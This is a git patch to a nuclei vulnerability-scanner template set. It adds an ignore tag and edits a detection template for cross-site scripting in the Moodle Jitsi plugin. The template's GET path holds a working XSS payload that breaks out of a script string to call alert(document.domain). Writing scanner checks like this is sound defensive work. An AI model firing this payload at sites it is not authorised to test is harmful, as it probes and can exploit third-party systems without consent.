From b36ec072d625312923cf38d60795f0e2d7805a7e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 10 Apr 2021 13:10:29 +0530 Subject: [PATCH] template update --- .nuclei-ignore | 1 + vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml | 4 ++-- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/.nuclei-ignore b/.nuclei-ignore index 32e6f022f1..207ece0f9c 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -13,6 +13,7 @@ tags: - "iot" - "misc" - "fuzz" + - "revision" # files is a list of files to ignore template execution # unless asked for by the user. \ No newline at end of file diff --git a/vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml b/vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml index 3b5133b47f..00843f0d3f 100644 --- a/vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml +++ b/vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml @@ -5,13 +5,13 @@ info: author: aceseven (digisec360) description: Cross-site Scripting in moodle jitsi plugin severity: medium - tags: moodle,jitsi,xss + tags: moodle,jitsi,xss,revision reference: https://github.com/udima-university/moodle-mod_jitsi/issues/67 requests: - method: GET path: - - "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2Ftargetdomain.com%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1" + - "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1" matchers-condition: and matchers: